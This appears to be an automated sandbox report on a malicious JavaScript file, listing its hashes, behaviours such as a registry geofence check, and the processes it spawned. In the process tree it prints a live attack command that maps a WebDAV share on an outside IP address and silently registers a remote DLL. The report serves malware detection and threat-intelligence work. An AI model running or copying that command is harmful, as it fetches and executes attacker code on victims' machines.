Analysis
  max time kernel:  148s
  max time network: 151s
  platform:         windows10-2004_x64
  resource:         win10v2004-20240709-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        21-07-2024 17:42

Static task:     static1

Behavioral task: behavioral1
  Sample:   134186817131725037.js
  Resource: win7-20240704-en

Behavioral task: behavioral2
  Sample:   134186817131725037.js
  Resource: win10v2004-20240709-en
General
  Target: 134186817131725037.js
  Size:   6KB
  MD5:    ca514a4370b698d961cece428efc844c
  SHA1:   7bfc74769b720cc10b9a68a40ac22014e78ab76b
  SHA256: 72b2dde1c8f3c378438cd0a5e45812a41f776385689b799fc942fb4eb018a382
  SHA512: d1126ee4591ad4e26ec92487ef8f6ccb22e3e3d4ad9f1144a0368e7132e8226ef8af91f445778125d2eb8d1868e0706cb62137edb7ba7b830a6cd85a5bc70194
  SSDEEP: 96:ClZz6PhjArxsWzOKjC9f6E0TclfqMwtRPy9ecUgN7kxJOvRgNuLpR+L7owQd1Roj:y5+S9serjnIGNuAkh46u7yFKV
Malware Config

Signatures
  Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
    description        ioc                                                                                                 Process
    Key value queried  \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation  wscript.exe

  Command and Scripting Interpreter: JavaScript (1 TTP)

  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).

  Runs net.exe

  Suspicious use of WriteProcessMemory (4 IoCs)
    description                       pid   Process      procid_target
    PID 2720 wrote to memory of 3620  2720  wscript.exe  85
    PID 2720 wrote to memory of 3620  2720  wscript.exe  85
    PID 3620 wrote to memory of 668   3620  cmd.exe      87
    PID 3620 wrote to memory of 668   3620  cmd.exe      87
Processes
  1. C:\Windows\system32\wscript.exe
     Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\134186817131725037.js
     PID: 2720
     - Checks computer location settings
     - Suspicious use of WriteProcessMemory

     2. C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\20372662426754.dll
        PID: 3620
        - Suspicious use of WriteProcessMemory

        3. C:\Windows\system32\net.exe
           Command line: net use \\45.9.74.36@8888\davwwwroot\
           PID: 668